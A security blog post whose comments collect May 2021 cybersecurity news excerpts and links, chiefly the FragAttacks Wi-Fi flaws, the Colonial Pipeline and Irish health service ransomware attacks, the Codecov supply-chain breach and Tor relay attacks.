This posting is here to collect cyber security news in May 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in May 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
318 Comments
Tomi Engdahl says:
Catalin Cimpanu / The Record:
Researcher discovers a series of vulnerabilities, known as Frag Attacks, impacting Wi-Fi devices from the past 24 years, even when WEP and WPA are activated — A Belgian security researcher has discovered a series of vulnerabilities that impact the WiFi standard, with some bugs dating …
WiFi devices going back to 1997 vulnerable to new Frag Attacks
https://therecord.media/wifi-devices-going-back-to-1997-vulnerable-to-new-frag-attacks/
A Belgian security researcher has discovered a series of vulnerabilities that impact the WiFi standard, with some bugs dating back as far back as 1997 and affecting devices sold for the past 24 years.
The vulnerabilities, known as Frag Attacks, allow an attacker within a device’s WiFi radio range to gather information about the owner and run malicious code to compromise a device, may it be a computer, smartphone, or other smart device.
Devices are also vulnerable even if the WiFi standard’s security protocols were activated, such as WEP and WPA.
Tomi Engdahl says:
Michael Holden / Reuters:
UK unveils Online Safety Bill which would fine social media firms up to 10% of revenue or £18M if they fail to address online abuses such as racist hate crimes — LONDON (Reuters) – Britain said on Wednesday a planned new law would see social media companies fined up to 10% of turnover …
UK unveils law to fine social media firms which fail to remove online abuse
https://www.reuters.com/article/uk-britain-politics-tech-idUSKBN2CS30C
LONDON (Reuters) – Britain said on Wednesday a planned new law would see social media companies fined up to 10% of turnover or 18 million pounds ($25 million) if they failed to stamp out online abuses such as racist hate crimes, while senior managers could also face criminal action.
The Online Safety Bill also seeks to strengthen the right to freedom of expression, and ensure democratic political debate and journalistic content is protected, the government said.
“It’s time for tech companies to be held to account and to protect the British people from harm. If they fail to do so, they will face penalties,” interior minister Priti Patel said.
Tomi Engdahl says:
Panic Buying Is Causing Fuel Shortages Along The Colonial Pipeline Route
https://www.forbes.com/sites/rrapier/2021/05/11/panic-buying-is-causing-gas-shortages-along-the-colonial-pipeline-route/
Because the Colonial Pipeline is such an important supply line for the southeast and the East Coast, a major disruption can quickly lead to shortages in fuel supplies across these regions. We have seen this in the past when the pipeline had to be down for more than a few days.
Hence, these regions braced for the worst following last Friday’s ransomware attack by the professional hacker group called Darkside. The Colonial Pipeline was taken down in response to the attack, and as of today the pipeline remains offline. Colonial Pipeline Company has said that it hopes to restore most operations by the end of the week.
But a weeklong outage on this pipeline is enough to spark regional shortages. Bloomberg reported that Colonial Pipeline Chief Executive Officer Joseph Blount warned state officials on Monday that supply shortages could occur before pipeline service is restored.
In any case, the fear of shortages is often enough to create actual shortages, and this is playing out across the pipeline’s route.
Fuel outages are being reported in Virginia, North Carolina, Georgia, Florida, and South Carolina. If you are wondering whether your area may be impacted by the outage, the Energy Information Administration released a map showing the major locations serviced by the pipeline.
https://www.eia.gov/todayinenergy/detail.php?id=47917
Tomi Engdahl says:
Anyone Can Identify And Report Stolen Art Instantly With New Interpol App
https://trib.al/owGecN1
Interpol launched a new mobile phone app Thursday that lets users search and identify stolen art pieces using image-recognition software, a tool authorities hope will help recover lost artwork and prevent trafficking.
Interpol’s ID-Art app allows users to take a photo in-app, upload an image or enter key descriptive terms into a search engine that runs against the organization’s stolen art database, which has information about more than 52,000 lost pieces of art.
If the work appears to match a registered stolen work, the app shows users more information about the lost piece and prompts them to report the item to Interpol with a pop up banner.
Tomi Engdahl says:
Threat Actor Compromised More than 25 Percent of Tor Network Relays, Research Shows
https://hotforsecurity.bitdefender.com/blog/threat-actor-compromised-more-than-25-percent-of-tor-network-relays-research-shows-25805.html
Unknown actors took control over a quarter of all Tor network relays to launch man-in-the-middle attacks, target bitcoin addresses and much more.
Tor is a software that lets users obfuscate their network traffic by routing it automatically through numerous volunteer-operated relays worldwide. That traffic is typically encrypted, so intercepting it is not really an option, but the attacker did something more subtle.
Security researcher ‘nusenu’ published an extensive analysis of the threat actors’ actions in 2021, saying that it’s likely the most significant relay compromise to date, covering around 27 percent of Tor Network Relays, a conservative estimate.
One problem the researcher found relates to how the Tor browser deals with unsecure links. It turns out that the Tor browser is not HTTPS-only, which means that it can also display HTTP. Showing websites in plain text is a gold mine for attackers looking for valuable information.
The researcher also says the full nature of the attacks is not known, with a few exceptions.
“We know about mitmproxy, sslstrip, bitcoin address rewrites and download modification attacks but it is not possible to rule out other types of attacks. Imagine an attacker runs 27% of the tor network’s exit capacity and a firefox exploit affecting Tor Browser gets published before all users got their (auto)updates,” said nusenu.
https://nusenu.medium.com/tracking-one-year-of-malicious-tor-exit-relay-activities-part-ii-85c80875c5df
Tomi Engdahl says:
WiFi vulnerability may leave millions of devices open to ‘frag attacks’
https://www.engadget.com/wifi-vulnerability-devices-frag-attacks-095048302.html
A security researcher known for pointing out faults in WiFi security has discovered another vulnerability. The newly unearthed flaws, known as “frag attacks,” are believed to be widespread as they stem from the WiFi standard, with some bugs dating back to 1997. While several additional vulnerabilities are caused by programming mistakes in WiFi products and affect every WiFi device, Belgian security researcher Mathy Vanhoef wrote on his blog.
Theoretically, if exploited, the vulnerabilities would allow an attacker within radio range to steal user information or attack devices. But, the chances of the flaws being abused should be low as the attacks require user interaction or uncommon network settings.
https://www.fragattacks.com/
Tomi Engdahl says:
The DarkSide hacking group has made as much as $30 million in the past six months. Its ransomware-as-a-service model appears to be working, as the shutdown of the largest U.S. fuel pipeline demonstrates.
The Colonial Pipeline Hackers Are One Of The Savviest Criminal Startups In A $370 Million Ransomware Game
https://www.forbes.com/sites/thomasbrewster/2021/05/12/the-colonial-pipeline-hackers-are-one-of-the-savviest-criminal-startups-in-a-370-million-ransomware-game/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Gordie&sh=5599362a7595
When Colonial Pipeline took its gasoline lines down following a successful cyberattack last week, it became the most high-profile victim of a hacking group called DarkSide.
But DarkSide isn’t a single entity. It’s a media-savvy, semiprofessional startup and software supplier for an illicit market of hackers looking for a quick easy way to breach and extort large businesses. In a ransomware game that, according to data from cryptocurrency tracker Chainalysis, has seen $370 million 2020 revenue for the criminals in the form of ransom payments, DarkSide and its partners represent a dangerous new breed of underground businesses that are working together to menace legitimate organizations, across public and private sectors.
The security industry calls DarkSide’s business model “ransomware-as-a-service,” as it mimics the software-as-a-service model
According to FireEye, the security company whose Mandiant division is helping the Colonial Pipeline recover, partners take 25% of ransom fees less than $500,000 and 10% of ransom fees above $5 million. Though that’s a sizable cut of the proceeds, the DarkSide operators make ransomware attacks so simple, customers keep coming. “It’s a great way of making quick money,” says Peter Kruse, founder and CEO of CSIS Security Group, which says it has seen various cybercrime actors using the DarkSide ransomware service.
To stand out from the crowd, DarkSide has promised the best encryption speeds to lock up computers faster than anyone else. It also supports attacks on both Microsoft Windows and Linux operating systems.
Lax security may be helping the hackers. Before DarkSide’s malware can be deployed, its customers first need to have broken into a network, and DarkSide doesn’t provide that service. Kruse says DarkSide’s partners look for vulnerable devices that can be found by scanning the web. Once those systems are found, they can be exploited and leverage gained on a target’s network. They then need to take control of other connected computers and install the DarkSide software, which wraps the victims’ data and locks it with keys targets must pay ransom to use.
“If I was going to hack that… I’d simply use a publicly available tool to connect to that port, run a little script and try all the credentials that I have, plus some of the common … default usernames and passwords,” Maley added. That “credential stuffing” attack could then provide enough network access to start finding a way to plant the ransomware.
There’s long been concern that critical infrastructure businesses aren’t well-prepared for the kinds of attack described by Maley, even if they’re far from the most sophisticated attacks the internet sees every day. “Legacy industrial control systems and other similar infrastructures were primarily designed to keep information in and execute their control tasks dependably and consistently. Unfortunately, there were little or no provisions built in to adequately secure the systems and keep people out,”
Personnel is another issue. Kruse and Maley noted that Colonial didn’t appear to have anyone in charge of cybersecurity. Colonial said its chief information officer, hired in 2017, led cybersecurity efforts, undertaking a review of its defenses and increasing total spending on IT, including cybersecurity, by more than 50% in the past four years. A spokesperson told Forbes it had “robust protocols and software in place to detect and address threats proactively and reactively,” and that its third-party incident response team determined it was following “best practices” before the breach. Any speculation about the root cause of the incident would be premature and not informed by the facts, they added. They declined to comment on whether or not a ransom had been paid, and wouldn’t say how much the hackers had demanded.
Another group, Babuk, has shown in the past month how devastating public shaming can be, after it hacked into the Washington, D.C., Metropolitan Police Department. When the police didn’t pay the $4 million ransom, Babuk started releasing the personal information of officers.
DarkSide has used a different tactic to try to improve its public image, presenting itself as a kind of Robinhood hacking organization, giving a small portion of stolen funds to charity, offering short-sellers advance information so they can bet on a victim’s stock tanking, and promising not to attack certain industries: hospitals, funeral services, schools, universities, nonprofits and government organizations. It even claims to only permit attacks on companies it knows can afford to pay, saying, “We do not want to kill your business.” As the group wrote on its dark web “press center” earlier this week: “Our goal is to make money, and not creating [sic] problems for society.”
With the Colonial Pipeline, DarkSide apparently realized too late that one of its partners had targeted an industry that served a huge number of consumers with gasoline and subsequently promised to “introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.” Now the world has its eyes on the hacking group. In a “flash notice” to the cybersecurity industry and government agencies this week, the FBI said it has been investigating DarkSide since October, just two months after it emerged. Its investigators and global partners have had increasing success against malware operators in recent months
the only authorities DarkSide appears to fear are Russian-speaking: Its malware won’t work if it detects its victim is Russian. This has led to accusations that the Kremlin either supports or harbors criminals that target Western businesses, something Putin’s government has staunchly denied. Dmitri Alperovitch, cofounder of cybersecurity company CrowdStrike and now executive chairman at the Silverado Policy Accelerator nonprofit, says there’s no evidence DarkSide has obvious links to Russian intelligence, adding, “Given their long past history of willful harboring of cybercrime, I don’t think it matters.”
Tomi Engdahl says:
From the original Vice article “A gang of cybercriminals who hacked the Washington D.C. Metropolitan Police Department have started leaking alleged internal police files, including “background investigations” on police officers that includes psychological evaluations, polygraph responses, supervisor interviews, their credit history, information about their home, their social security numbers, date of birth, personal emails, home address, phone numbers, their driver’s licenses, financial details, and their handwritten signatures. ”
https://www.vice.com/en/article/wx5deq/hackers-leak-personal-data-of-washington-dc-police-officers
Tomi Engdahl says:
Pipeline operations restarted at around 5 p.m. Eastern time Wednesday.
Colonial Pipeline Restarts Operations After Hack, But Fuel Shortages Will Linger
https://www.forbes.com/sites/nicholasreimann/2021/05/12/colonial-pipeline-restarts-operations-after-hack-but-fuel-shortages-to-linger/
Tomi Engdahl says:
BIG NUMBER
11. That’s how many states are dealing with significant fuel shortages, according to gas station finding-app Gasbuddy. North Carolina has been by far the hardest-hit, with 65% of gas stations reporting no fuel Wednesday afternoon.
https://www.forbes.com/sites/nicholasreimann/2021/05/12/colonial-pipeline-restarts-operations-after-hack-but-fuel-shortages-to-linger/
Tomi Engdahl says:
https://portswigger.net/daily-swig/remote-mouse-mobile-app-contains-raft-of-zero-day-rce-vulnerabilities
Tomi Engdahl says:
“I mean an eighth-grader could have hacked into that system.”
Tech audit of Colonial Pipeline found ‘glaring’ problems
By FRANK BAJAK
May 13, 2021
https://apnews.com/article/va-state-wire-technology-business-1f06c091c492c1630471d29a9cf6529d
BOSTON (AP) — An outside audit three years ago of the major East Coast pipeline company hit by a cyberattack found “atrocious” information management practices and “a patchwork of poorly connected and secured systems,” its author told The Associated Press.
“We found glaring deficiencies and big problems,” said Robert F. Smallwood, whose consulting firm delivered an 89-page report in January 2018 after a six-month audit. “I mean an eighth-grader could have hacked into that system.”
How far the company, Colonial Pipeline, went to address the vulnerabilities isn’t clear.
Tomi Engdahl says:
Rapid7 source code, credentials accessed in Codecov supply-chain attack
https://www.bleepingcomputer.com/news/security/rapid7-source-code-credentials-accessed-in-codecov-supply-chain-attack/
US cybersecurity firm Rapid7 has disclosed that some source code repositories were accessed in a security incident linked to the supply-chain attack that recently impacted customers of the popular Codecov code coverage tool.
The computer and network security company has already notified a “small subset of customers” potentially impacted by this breach to take measures to mitigate any potential risks.
Only internal credentials and tooling source code accessed
The unknown threat actors behind this incident were only able to gain access to a “small subset” of repositories containing source code for internal tooling used for Rapid7′s Managed Detection and Response (MDR) service.
The cybersecurity firm added that the Codecov tools compromised in last month’s supply-chain attack were not used to work with production code.
“Our use of Codecov’s Bash Uploader script was limited: it was set up on a single CI server used to test and build some internal tooling for our Managed Detection and Response (MDR) service,” Rapid7 said.
The compromised tool allowed the threat actors to harvest sensitive information (e.g., credentials, tokens, or API keys) from customers’ continuous integration (CI) environments and send it to attacker-controlled servers for more than two months.
Two weeks after disclosing the breach discovered on April 1st, Codecov began notifying customers affected by the supply-chain attack
Tomi Engdahl says:
https://voidsec.com/nvidia-geforce-experience-command-execution/
Tomi Engdahl says:
Report: U.S. Officials Investigating Crypto Exchange Binance Amid Market’s Massive Boom
https://www.forbes.com/sites/jonathanponciano/2021/05/13/report-binance-investigation-crypto-market/
The Department of Justice and Internal Revenue Service have reportedly opened an investigation into cryptocurrency exchange Binance, heightening tensions in the largely unregulated industry amid unprecedented market volatility and reports that hackers demanded a $5 million cryptocurrency ransom from the fuel company that halted operations this week.
cryptocurrencies “a particular concern,” and urged lawmakers to take action to “curtail their use,” particularly to ensure they’re not used for illicit financing.
Colonial Pipeline reportedly paid hackers $5 million in an unidentified cryptocurrency on Friday following a cyberattack that forced the pipeline offline and created a severe gas shortage.
Hackers Got $5 Million: Colonial Pipeline Reportedly Paid A Ransom In Cryptocurrency, Contrary To Claims
https://www.forbes.com/sites/melissaholzberg/2021/05/13/hackers-got-5-million-colonial-pipeline-reportedly-paid-a-ransom-in-cryptocurrency-contrary-to-claims/?sh=31bd8e3f799e
TOPLINE The Colonial Pipeline Company reportedly paid hackers $5 million on Friday following a cyberattack that forced the pipeline offline and created a severe gas shortage, sources told Bloomberg News Thursday, which conflicts with reports the company would not pay a ransom.
Colonial was attacked by DarkSide, a group of hackers in Eastern Europe, on Friday and the company was forced to stop service of 2.5 million barrels of gasoline for five days.
The pipeline company reportedly paid the $5 million in cryptocurrency soon after the cyberattack, but the tool the hackers gave the company to restore its computer network took too long to work.
The Washington Post reported Wednesday the company was working with FireEye, a cybersecurity company, to recover its systems rather than pay the ransom, and the FBI does not recommend paying ransomware hackers because it “doesn’t guarantee you or your organization will get any data back.”
Colonial announced Wednesday night pipeline service was fully restored, but many gas stations continued to experience gas shortages as the company warned there would be “intermittent service interruptions” over the next few days.
The national average gas price climbed to $3.028 a gallon on Thursday, the highest it’s been in six years, according to AAA
Tomi Engdahl says:
A security researcher found Wi-Fi vulnerabilities that have existed since the beginning
The cycle of painful updates begins anew
https://www.theverge.com/2021/5/12/22433134/fragattacks-wi-fi-vulnerabilities-update-security
The security researcher who discovered the Krack Wi-Fi vulnerability has discovered a slew of other flaws with the wireless protocol most of us use to power our online lives (via Gizmodo). The vulnerabilities relate to how Wi-Fi handles large chunks of data, with some being related to the Wi-Fi standard itself, and some being related to how it’s implemented by device manufacturers.
The researcher, Mathy Vanhoef, calls the collection of vulnerabilities “FragAttacks,” with the name being a mashup of “fragmentation” and “aggregation.” He also says the vulnerabilities could be exploited by hackers, allowing them to intercept sensitive data, or show users fake websites, even if they’re using Wi-Fi networks secured with WPA2 or even WPA3. They could also theoretically exploit other devices on your home network.
There are twelve different attack vectors that fall under the classification, which all work in different ways. One exploits routers accepting plaintext during handshakes, one exploits routers caching data in certain types of networks, etc. If you want to read all the technical details on how exactly they work, you can check out Vanhoef’s website.
https://www.fragattacks.com/
Three of the discovered vulnerabilities are design flaws in the Wi-Fi standard and therefore affect most devices. On top of this, several other vulnerabilities were discovered that are caused by widespread programming mistakes in Wi-Fi products. Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities.
The discovered vulnerabilities affect all modern security protocols of Wi-Fi, including the latest WPA3 specification. Even the original security protocol of Wi-Fi, called WEP, is affected. This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997! Fortunately, the design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings. As a result, in practice the biggest concern are the programming mistakes in Wi-Fi products since several of them are trivial to exploit.
The discovery of these vulnerabilities comes as a surprise, because the security of Wi-Fi has in fact significantly improved over the past years. For instance, previously we discovered the KRACK attacks, the defenses against KRACK were proven secure, and the latest WPA3 security specification has improved. Unfortunately, a feature that could have prevented one of the newly discovered design flaws was not adopted in practice, and the other two design flaws are present in a feature of Wi-Fi that was previously not widely studied. This shows it stays important to analyze even the most well-known security protocols (if you want to help, we are hiring). Additionally, it shows that it’s essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them.
Tomi Engdahl says:
Colonial Pipeline Shells Out $5M in Extortion Payout, Report >
- It should be illegal to pay Ransoms. Problem solved.
Colonial Pipeline Shells Out $5M in Extortion Payout, Report
https://threatpost.com/colonial-pays-5m/166147/
According to news reports, Colonial Pipeline paid the cybergang known as DarkSide the ransom it demanded in return for a decryption key.
Colonial Pipeline Co., operator of the largest U.S. fuel pipeline, reportedly paid $5 million to criminals behind a ransomware attack that has sent fuel prices spiking up and down the East Coast.
Sources familiar with the payout told Bloomberg that representatives of Colonial Pipeline paid the cybergang known as DarkSide the ransom it demanded in return for a decryption tool that allowed the firm to restore its computer network disabled in last week’s attack.
On Wednesday, the energy firm restarted its pipeline operations after five days of being shut down: a shutdown done proactively following the ransomware attack.
News of the payment is an about-face: according to reports on Wednesday, the company had no intention of paying the ransom.
“The company paid the hefty ransom in difficult-to-trace cryptocurrency within hours after the attack, underscoring the immense pressure faced by the Georgia-based operator to get gasoline and jet fuel flowing again to major cities along the Eastern Seaboard,” Bloomberg reporters William Turton, Michael Riley and Jennifer Jacobs wrote.
Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom
https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom
Tomi Engdahl says:
https://www.fragattacks.com/
https://github.com/vanhoefm/fragattacks/blob/master/SUMMARY.md
Tomi Engdahl says:
The cyberattack has disrupted some health services in the country, but its Covid-19 vaccine rollout remains unaffected.
Ireland’s Health System Forced To Shut Computer Systems After Being Hit By ‘Significant’ Ransomware Attack
https://trib.al/GbV2asH
Ireland’s national health service operator was hit by a major ransomware attack that forced it to shut down all of its IT systems, the government agency announced on Friday, adding that its Covid-19 vaccination program remains unaffected.
Tomi Engdahl says:
We Found Joe Biden’s Secret Venmo. Here’s Why That’s A Privacy Nightmare For Everyone.
https://www.buzzfeednews.com/article/ryanmac/we-found-joe-bidens-secret-venmo
The peer-to-peer payments app leaves everyone from ordinary people to the most powerful person in the world exposed.
BuzzFeed News found President Joe Biden’s Venmo account after less than 10 minutes of looking for it, revealing a network of his private social connections, a national security issue for the United States, and a major privacy concern for everyone who uses the popular peer-to-peer payments app.
On Friday, following a passing mention in the New York Times that the president had sent his grandchildren money on Venmo, BuzzFeed News searched for the president’s account using only a combination of the app’s built-in search tool and public friends feature. In the process, BuzzFeed News found nearly a dozen Biden family members and mapped out a social web that encompasses not only the first family, but a wide network of people around them, including the president’s children, grandchildren, senior White House officials, and all of their contacts on Venmo.
The president’s transactions are not public, and BuzzFeed News is not identifying the usernames for the accounts mentioned in this story due to national security concerns.
Privacy advocates and journalists have warned about Venmo’s privacy problems for years, yet the PayPal-owned app has persisted with features that can place people — including the president of the United States — at risk.
Tomi Engdahl says:
Elliptic Follows the Bitcoin Ransoms Paid by Colonial Pipeline and Other DarkSide Ransomware Victims
https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims
Elliptic has identified the Bitcoin wallet used by the DarkSide ransomware group to receive ransom payments from its victims, based on our intelligence collection and analysis of blockchain transactions. This wallet received the 75 BTC payment made by Colonial Pipeline on May 8, following the crippling cyberattack on its operations – leading to widespread fuel shortages in the US.
The wallet has been active since 4th March 2021 and has received 57 payments from 21 different wallets. Some of these payments directly match ransoms known to have been paid to DarkSide by other victims, such as 78.29 BTC (worth $4.4 million) sent by chemical distribution company Brenntag on May 11.
In total, the DarkSide wallet has received Bitcoin transactions since March with a total value of $17.5 million. Ransoms associated with previous attacks were paid to other wallets.
We can also use blockchain analysis to follow the money trail and determine where DarkSide is sending its ransomware proceeds, to launder them or convert them to cash.
Tomi Engdahl says:
It wasn’t just Peloton with a leaky API. Its rival, Echelon, did too. https://tcrn.ch/3og9s2Y
Echelon exposed riders’ account data, thanks to a leaky API
https://techcrunch.com/2021/05/14/echelon-leaky-api-riders-account-data/?tpcc=ECFB2021
Peloton wasn’t the only at-home workout giant exposing private account data. Rival exercise giant Echelon also had a leaky API that let virtually anyone access riders’ account information.
Fitness technology company Echelon, like Peloton, offers a range of workout hardware — bikes, rowers and a treadmill — as a cheaper alternative for members to exercise at home. Its app also lets members join virtual classes without the need for workout equipment.
But Jan Masters, a security researcher at Pen Test Partners, found that Echelon’s API allowed him to access the account data — including name, city, age, sex, phone number, weight, birthday and workout statistics and history — of any other member in a live or pre-recorded class.
Tomi Engdahl says:
Security News This Week: Microsoft Will Soon Kill Flash on Windows 10 for Good
Plus: A Peloton data leak, Russian hacker details, and more of the week’s top security news.
microsoft
https://www.wired.com/story/flash-windows-10-peloton-bug-russian-svr-hackers-security-news/
Tomi Engdahl says:
https://www.forbes.com/sites/daveywinder/2021/05/07/google-to-suddenly-flip-the-security-switch-on-millions-of-gmail-accounts/
Tomi Engdahl says:
Darkside Hackers : Everything You Need To Know About The Colonial Pipeline DarkSide Ransomware Attack
https://www.rebellionresearch.com/darkside-hackers-everything-you-need-to-know-about-the-colonial-pipeline-darkside-ransomware-attack
The hackers behind the attack, the DarkSide Ransomware Gang, generally operate within a “Ransomware-as-a-Service” business model. In simple terms, this means that they lease their malicious code to cybercriminals that wish to extort ransoms from potential victims but lack the technical expertise to design their own proprietary malware.
DarkSide is only one of many outfits that sell code, and additionally, they engage in “Double Extortion” tactics that include both file encryption and threats to publish stolen data via a “dark web” leak site.
Generally, groups like Darkside will provide victims with a ransom note and request payment in Bitcoin. If the payment request is ignored, the victims files will remain encrypted and inaccessible, and the group will publish sensitive files to attempt to shame the victim and compel them to pay up. It also serves as a tactic to intimidate future victims into believing that there will be a consequence for non-payment.
“We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for other motives [sic],” the group said on their data leak site. “Our goal is to make money, and not create problems for society. From today we introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.”
DarkSide generally only targets large corporations and does not allow its customers to employ ransomware against several industries that include education, healthcare, funeral services and nonprofits.
Tomi Engdahl says:
https://arstechnica.com/gadgets/2021/05/dell-patches-a-12-year-old-privilege-escalation-vulnerability/
Tomi Engdahl says:
New Spectre attack once again sends Intel and AMD scrambling for a fix
https://arstechnica.com/gadgets/2021/05/new-spectre-attack-once-again-sends-intel-and-amd-scrambling-for-a-fix/
Tomi Engdahl says:
Apple AirTag hacked again – free internet with no mobile data plan!
https://nakedsecurity.sophos.com/2021/05/14/apple-airtags-hacked-again-free-internet-with-no-mobile-data-plan/
Earlier this week we wrote about a jailbreak hack against Apple’s newly introduced AirTag product.
In that story, the researcher @ghidraninja was able to modify the firmware on the AirTag itself, despite the anti-tampering protection implemented by Apple’s own AirTag firmware programming.
But this “attack” (if that is the right word) is different, because it doesn’t involve modifying or cracking the AirTag itself.
Instead, it involves using the AirTag protocol on a Bluetooth device that doesn’t have internet connectivity in order to “trick” (if that is the right word) nearby Apple devices into sending data over the internet on its behalf.
Very loosely put: free internet access!
(But with some spectacular limitations on bandwidth and latency,as we shall see below.)
In the paper describing the hack, the device used was a cheap and easily programmable ESP32 Bluetooth/Wi-Fi chip commonly used in IoT devices and readily available from hobby electronics websites.
Tomi Engdahl says:
https://www-theverge-com.cdn.ampproject.org/c/s/www.theverge.com/platform/amp/2021/5/12/22433134/fragattacks-wi-fi-vulnerabilities-update-security
Tomi Engdahl says:
Kiristysohjelma sulki Irlannin terveydenhuollon tietojärjestelmän – ministeri: Todennäköisesti vakavin kyberhyökkäys Irlannissa
Viranomaiset vakuuttavat, ettei potilastietoja joutunut vääriin käsiin. Koronavirusrokotuksia säätelevä järjestelmä ei kaatunut, mutta uusia aikoja testeihin ei pysty varaamaan.
https://yle.fi/uutiset/3-11932194
Tomi Engdahl says:
Jellyfish is a Linux based userland gpu rootkit proof of concept project utilizing the LD_PRELOAD technique from Jynx (CPU), as well as the OpenCL API developed by Khronos group (GPU). Code currently supports AMD and NVIDIA graphics cards. However, the AMDAPPSDK does support Intel as well.
https://github.com/nwork/jellyfish
Tomi Engdahl says:
The folder name is literally “Don’t ship it with your game.”
Fall Guys studio accidentally leaks the source code onto Steam
By Andy Chalk 2 days ago
Should’ve paid more attention to that folder name.
https://www.pcgamer.com/fall-guys-studio-accidentally-leaks-the-source-code-onto-steam/?utm_source=facebook.com&utm_medium=social&utm_campaign=socialflow
The weekend got off to what was likely a very interesting start for Fall Guys studio Mediatonic, which apparently—somehow—managed to leak the game’s source code in an accidental Steam update.
The whole thing was deleted very quickly, of course, but not before the big banana-slip was noticed and captured for posterity by SteamDB creator Pavel Djundik.
The name of the directory through which everything flowed out into the digital ether—”BackUpThisFolder_ButDontShipItWithYourGame”—makes the whole thing seem even funnier from an outsider’s perspective, but it’s actually auto-generated by Unity to contain data required to debug games, including PDB files and C++ code generated from scripts. In case the folder name isn’t sufficiently clear, the Unity docs also warn the developers “should back up this folder for every build you ship, but don’t redistribute it.”
Tomi Engdahl says:
We Found Joe Bidens Secret Venmo. Heres Why Thats A Privacy Nightmare For Everyone.
https://www.buzzfeednews.com/article/ryanmac/we-found-joe-bidens-secret-venmo
BuzzFeed News found President Joe Bidens Venmo account after less than
10 minutes of looking for it, revealing a network of his private social connections, a national security issue for the United States, and a major privacy concern for everyone who uses the popular peer-to-peer payments app.
Tomi Engdahl says:
HTML Phishing Email Opens the Door for Threat Actors https://cofense.com/blog/html-phishing-email/
The Cofense Phishing Defense Center (PDC) has observed a credential phishing trend whereby threat actors are sending out several emails to employees with nothing more than an HTML attachment and subject line, OfficeDoc Important Business/Work Guide. As organizations are planning for return-to-work procedures, threat actors are leveraging this theme to increase the likelihood of user . interaction with the attachment.
Tomi Engdahl says:
Chemical distributor pays $4.4 million to DarkSide ransomware https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/
In this particular case, the DarkSide affiliate claims to have gotten access to the network after purchasing stolen credentials. However, the DarkSide affiliate does not know how the credentials were originally obtained.
Tomi Engdahl says:
Irelands Health Services hit with $20 million ransomware demand https://www.bleepingcomputer.com/news/security/ireland-s-health-services-hit-with-20-million-ransomware-demand/
Yesterday, a cybersecurity researcher shared a screenshot of a chat between Conti and Ireland’s HSE with BleepingComputer.. In the screenshot, the Conti gang claims to have had access to the HSE network for two weeks. During this time, they claim to have stolen 700 GB of unencrypted files from the HSE, including patient info and employee info, contracts, financial statements, payroll, and more.
Tomi Engdahl says:
DarkSide Drama Isnt The Death Of Ransomware – Its Not Even The Death Of DarkSide https://www.forbes.com/sites/daveywinder/2021/05/15/darkside-faq-who-are-the-5-million-colonial-pipeline-ransomware-attackers/
DarkSide was effectively forced into retreat by alleged law enforcement or unspecified government disruption of the publicity blog and the ransom negotiation dark web site.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/apple/apple-rejected-over-215-000-apps-in-2020-for-privacy-violations/
Apple says that more than 215,000 iOS apps were blocked by its App Store’s App Review team for privacy violations in 2020, while another
150,00 were rejected because they were spamming or misleading iOS users.. The company also blocked 48,000 applications from being published on the App Store due to using undocumented or having hidden features.. Ninety-five thousand additional apps were also removed from the App Store for using bait-and-switch tactics where new features and capabilities were added to fundamentally change their functionality after being approved.
Tomi Engdahl says:
Brazilian gang defrauds Uber, Lyft, DoorDash using GPS spoofing and stolen IDs https://therecord.media/brazilian-gang-defrauds-uber-lyft-doordash-using-gps-spoofing-and-stolen-ids/
According to court documents obtained by The Record, the gang used stolen IDs to create driver accounts at the aforementioned services, which they later sold to individuals who were not eligible for such accounts.. The gang also sold GPS-spoofing tech to drivers that made rides appear longer than they were or food delivery routes shorter in order to obtain increased fares.
Tomi Engdahl says:
[The Irish Health Service Executive] shuts down IT systems amid significant cyber attack
https://www.irishtimes.com/news/health/hse-shuts-down-it-systems-amid-significant-cyber-attack-1.4564957
There has been a significant ransomware attack on the Health Service Executives (HSE) IT systems.. The HSE said it has taken the precaution of shutting down all its IT systems in order to protect them from this attack and to allow us fully assess the situation with our own security partners.. Also https://www.theregister.com/2021/05/14/ireland_hse_ransomware_hospital_conti_wizardspider/
https://www.bbc.com/news/world-europe-57111615.
https://www.bleepingcomputer.com/news/security/irish-healthcare-shuts-down-it-systems-after-conti-ransomware-attack/
Tomi Engdahl says:
Toshiba unit hacked by DarkSide, conglomerate to undergo strategic review https://www.reuters.com/business/autos-transportation/toshibas-european-business-hit-by-cyberattack-source-2021-05-14/
A Toshiba Corp (6502.T) unit said it was hacked by the DarkSide ransomware group, overshadowing an announcement of a strategic review for the Japanese conglomerate under pressure from activist shareholders to seek out suitors.
Tomi Engdahl says:
DarkSide Ransomware Gang Quits After Servers, Bitcoin Stash Seized https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/
Servers were seized (country not named), money of advertisers and founders was transferred to an unknown account, reads a message from a cybercrime forum reposted to the Russian OSINT Telegram channel.
Tomi Engdahl says:
DarkSide ransomware servers reportedly seized, operation shuts down https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-operation-shuts-down/
REvil’s representative, UNKN, states that affiliates are now required first to gain permission to target an organization and that they can no longer target the following entities:. 1. Work in the social sector (health care, educational institutions) is prohibited;. 2. It is forbidden to work on the gov-sector (state) of any country;
Tomi Engdahl says:
“Open” Access to Industrial Systems Interface is Also Far From Zero
https://isc.sans.edu/diary/rss/27418
I had a look at open port 5900 & 5901 and captured 655K exposed VNC servers. … Based on the sample screenshots below, you realize that many organizations are at risk, and many bad stories like the US pipeline attack will continue to raise in the news…
Tomi Engdahl says:
Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons https://thehackernews.com/2021/05/magecart-hackers-now-hide-php-based.html
